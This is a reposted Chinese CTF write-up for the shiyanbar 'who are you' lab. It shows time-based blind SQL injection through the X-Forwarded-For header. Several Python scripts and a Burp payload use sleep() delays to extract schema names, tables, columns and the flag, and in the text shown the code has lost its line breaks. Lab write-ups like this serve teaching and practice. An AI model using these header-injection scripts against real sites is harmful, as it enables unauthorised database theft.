who are you

參考了各處blog:發(fā)現(xiàn)只有這個鏈接可以求出flag

在看看求不出來的鏈接的內(nèi)容：

簡書 作者：Ovie

#-*-coding:utf-8-*- import requests import string url="http://ctf5.shiyanbar.com/web/wonderkun/index.php" guess='abcdefghijklmnopqrstuvwxyz0123456789@_.{}-' flag=""for i in range(1,33):for str in guess:headers={"x-forwarded-for":"'+"+"(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(5) else 1 end ) and '1'='1" %(i,str)}try: res=requests.get(url,headers=headers,timeout=5)except requests.exceptions.ReadTimeout, e:flag = flag + strprint "flag:", flagbreakprint 'result:' + flag

這個一變結果就變原版的代碼求出來cdbf14c955ad5bex612f7bb5d28tBs53（不對）

現(xiàn)在先來看結果在分析一下本題：

事先確定了flag存儲在flag表的flag字符里，且flag的長度為32，在那篇的基礎修改了一下。

#-*-coding:utf-8-*-#基于python2.7 import requests import string import time url="http://ctf5.shiyanbar.com/web/wonderkun/index.php" payloads='abcdefghijklmnopqrstuvwxyz0123456789@_.{}-' flag="" print("Start") for i in range(33): for payload in payloads: starttime = time.time()#記錄當前時間 url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"#題目url headers = {"Host": "ctf5.shiyanbar.com", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Cookie": "Hm_lvt_34d6f7353ab0915a4c582e4516dffbc3=1470994390,1470994954,1470995086,1471487815; Hm_cv_34d6f7353ab0915a4c582e4516dffbc3=1*visitor*67928%2CnickName%3Ayour", "Connection": "keep-alive", "X-FORWARDED-FOR":"127.0.0.1' and case when ((select count(flag) from flag where flag like '"+flag+payload+"%')>0) then sleep(5) else sleep(0) end and '1'='1" } #bp拿到header并對X-FORWARDED-FOR進行修改，后面語句大意為從flag中選擇出flag，若首字母段為flag，payload變量拼接則sleep5秒,看不懂的可以學一下case when語句和like %語句 res = requests.get(url, headers=headers) if time.time() - starttime > 5: starttime2 = time.time() res = requests.get(url, headers=headers) if time.time() - starttime > 5: flag += payload print("flag is:%s"%flag) break else: pass#print('',)#沒啥解釋的了，就是不斷試payload，找到就接到flag上去然后繼續(xù)試下一個 print('\n[Finally] current flag is %s' % flag)

分析：

訪問鏈接，頁面顯示your IP is XX.XX.XX.XX，知道這是一個關于IP偽造。
嘗試各種偽造IP的HTTP頭：

X-Forwarded-For Client-IP x-remote-IP x-originating-IP x-remote-addr

實驗了一下，這里使用了google的Modify-http-headers插件進行修改ip為127.0.0.1，發(fā)現(xiàn)鏈接打開顯示確實改變了，但是依舊沒有任何關于flag的線索，bp看了一下，，，果然是想當然，一無所獲，然后重新看了下題目意思
劃重點：記錄db中去
完美，這就告訴了我們一件事，即X-Forwarded-For對應值被先存入數(shù)據(jù)庫，再取出來，而不是直接顯示給我們看
盲注，沒有什么其他的注入方式了
盲注分三種常見形式：分別基于布爾值，報錯，時間延遲
簡單測試，sleep有延時反應，應該是時間盲注了

1.暴力求數(shù)據(jù)庫名:

#基于python3.0x # -*- coding:utf-8 -*- import requests import string url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php" guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation database=[]for database_number in range(0,100): #假設爆破前100個庫databasename=''for i in range(1,100): #爆破字符串長度，假設不超過100長度flag=0for str in guess: #爆破該位置的字符#print 'trying ',strheaders = {"X-forwarded-for":"'+"+" (select case when (substring((select schema_name from information_schema.SCHEMATA limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(database_number,i,str)}try:res=requests.get(url,headers=headers,timeout=4)except:databasename+=strflag=1print('正在掃描第%d個數(shù)據(jù)庫名，the databasename now is '%(database_number+1) ,databasename) breakif flag==0:breakdatabase.append(databasename)if i==1 and flag==0:print('掃描完成')breakfor i in range(len(database)):print(database[i])

暴力求表名:

這里面需要提前知道，有information_sechma和web4，第一個在我的電腦上是有59列，但是也不知道他有幾個…所以寫個小腳本跑一下

# -*- coding:utf-8 -*- #基于python3.0 import requests import string url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php" guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation database=[]for table_number in range(0,500): print('trying',table_number)headers = {"X-forwarded-for":"'+"+" (select case when (select count(table_name) from information_schema.TABLES ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}try:res=requests.get(url,headers=headers,timeout=4)except:print(table_number)break

可以得到有42(睜著眼睛說瞎話)個列…有點多啊…不過呢我們一般猜測都在最后，
前面的應該都是什么information_schema里的那個。嘗試一下：

#基于python3.0 # -*- coding:utf-8 -*- import requests import string url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php" guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation tables=[]for table_number in range(42,43): #假設從第60個開始tablename=''for i in range(1,100): #爆破字符串長度，假設不超過100長度flag=0for str in guess: #爆破該位置的字符headers = {"X-forwarded-for":"'+"+" (select case when (substring((select table_name from information_schema.TABLES limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(table_number,i,str)}try:res=requests.get(url,headers=headers,timeout=4)except:tablename+=strflag=1print('正在掃描第%d個數(shù)據(jù)庫名，the tablename now is '%(table_number+1) ,tablename)breakif flag==0:breaktables.append(tablename)if i==1 and flag==0:print ('掃描完成')breakfor i in range(len(tables)):print (tables[i])

是他沒毛病。

暴力求列名 :
其實直接猜是不是flag啊…不過還是可以暴力，因為是上面列的最后一個嘛，
所以關鍵字段肯定也是最后一個吧，老思路，看有幾個列，然后暴力最后一個。
看有幾個列

#基于python3.0 # -*- coding:utf-8 -*- import requests import string url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php" guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation database=[]for table_number in range(0,1000): print( 'trying',table_number)headers = {"X-forwarded-for":"'+"+" (select case when (select count(COLUMN_name) from information_schema.COLUMNS ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}try:res=requests.get(url,headers=headers,timeout=4)except:print (table_number)break

#基于python3.0 # -*- coding:utf-8 -*- import requests import string url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php" guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation columns=[]for column_number in range(484,485): #假設從第60個開始cloumnname=''for i in range(1,100): #爆破字符串長度，假設不超過100長度flag=0for str in guess: #爆破該位置的字符#print 'trying',strheaders = {"X-forwarded-for":"'+"+" (select case when (substring((select COLUMN_name from information_schema.COLUMNS limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(column_number,i,str)}try:res=requests.get(url,headers=headers,timeout=4)except:cloumnname+=strflag=1print('正在掃描第%d個列名，the cloumnname now is '%(column_number+1) ,cloumnname) breakif flag==0:breakcolumns.append(cloumnname)if i==1 and flag==0:print('掃描完成') breakfor i in range(len(columns)):print(columns[i])

當改成其他的看看什么情況：

到這里我們確定了flag存儲在flag表的flag字段里。

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
flag的長度為32（這個 長度驗證見bp了）
事先驗證flag記錄的長度，用以下語句來注入：
1' and (select case when (select length(flag) from flag limit 1)=32 then sleep(5) else 1 end) and '1'='1
當點擊Repeter的Go按鈕，等待了約五秒，Go按鈕從不可按狀態(tài)轉(zhuǎn)為可按狀態(tài)，cancel按鈕從可按狀態(tài)轉(zhuǎn)為不可按狀態(tài)，
Reponse沒有任何返回，且Burpsuite 的Alerts模塊里新增一個Timeout的提示。就表明后臺延時了5秒。
這就可以確定其長度為32了。
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

方法二：不需要知道長度直接暴力

#基于python3.0 #-*-coding:utf-8-*- import requests import string url="http://ctf5.shiyanbar.com/web/wonderkun/index.php" guess=string.ascii_lowercase + string.ascii_uppercase + string.digits flag=""for i in range(1,100):havetry=0for str in guess:headers={"x-forwarded-for":"' +(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(7) else 1 end ) and '1'='1" %(i,str)}try: res=requests.get(url,headers=headers,timeout=6)except(requests.exceptions.ReadTimeout):havetry=1flag = flag + strprint( "flag:", flag)breakif havetry==0:break print( 'result:' + flag)

終于寫+測試完了，睡覺去咯。

參考1
參考2

總結

以上是生活随笔為你收集整理的who are you-实验吧1的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。